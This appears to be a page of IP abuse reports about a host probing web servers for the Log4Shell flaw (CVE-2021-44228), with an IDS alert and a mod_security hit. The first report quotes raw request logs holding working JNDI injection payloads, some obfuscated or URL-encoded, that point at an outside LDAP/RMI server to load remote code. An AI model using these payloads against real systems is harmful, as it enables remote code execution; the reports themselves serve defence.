GET / HTTP/1.1 Referer="${jndi:ldap://167.99.115.<<removed>>:1389/Binary}" User-agent="${jndi:ldap:/ ...
show moreGET / HTTP/1.1 Referer="${jndi:ldap://167.99.115.<<removed>>:1389/Binary}" User-agent="${jndi:ldap://167.99.115.<<removed>>:1389/Binary}"
GET / HTTP/1.1 Referer="${${::-j}ndi:rmi://167.99.115.<<removed>>:1389/Binary}" User-agent="${${::-j}ndi:rmi://167.99.115.<<removed>>:1389/Binary}"
GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F167.99.115.<<removed>>%3A1389%2FBinary%7D HTTP/1.1 Referer="${jndi:ldap://167.99.115.<<removed>>:1389/Binary}" User-agent="${jndi:ldap://167.99.115.<<removed>>:1389/Binary}"
GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F167.99.115.<<removed>>%3A1389%2FBinary%7D HTTP/1.1 Referer="${${::-j}ndi:rmi://167.99.115.<<removed>>:1389/Binary}" User-agent="${${::-j}ndi:rmi://167.99.115.<<removed>>:1389/Binary}"
show less
This IP carried out Apache Log4j RCE attempt(s) (also known as CVE-2021-44228 or Log4Shell). For mor ...
show moreThis IP carried out Apache Log4j RCE attempt(s) (also known as CVE-2021-44228 or Log4Shell). For more information, or to report interesting/incorrect findings, give me a shoutout on @parthmaniar on Twitter.
show less
US_IONOS_<177>1640110844 [1:2034808:1] ET INFO Possible Apache log4j RCE Attempt - Any Protocol (low ...
show moreUS_IONOS_<177>1640110844 [1:2034808:1] ET INFO Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1]: <seconione-ens192-1> {TCP} 108.175.3.218:44764
show less
(mod_security) mod_security (id:932130) triggered by 108.175.3.218 (US/United States/-): 1 in the la ...
show more(mod_security) mod_security (id:932130) triggered by 108.175.3.218 (US/United States/-): 1 in the last 3600 secs
show less
At the time of this report, host 108.175.3.218 was observed probing for Log4j zero-day vulnerabiliti ...
show moreAt the time of this report, host 108.175.3.218 was observed probing for Log4j zero-day vulnerabilities.
The Apache Log4j vulnerability (CVE-2021-44228) was first seen in December 2021. See the NIST report here for more details: https://nvd.nist.gov/vuln/detail/CVE-2021-44228. PLEASE CONDUCT YOUR OWN THOROUGH ANALYSIS BEFORE DISREGARDING LOGS FROM THIS HOST.
show less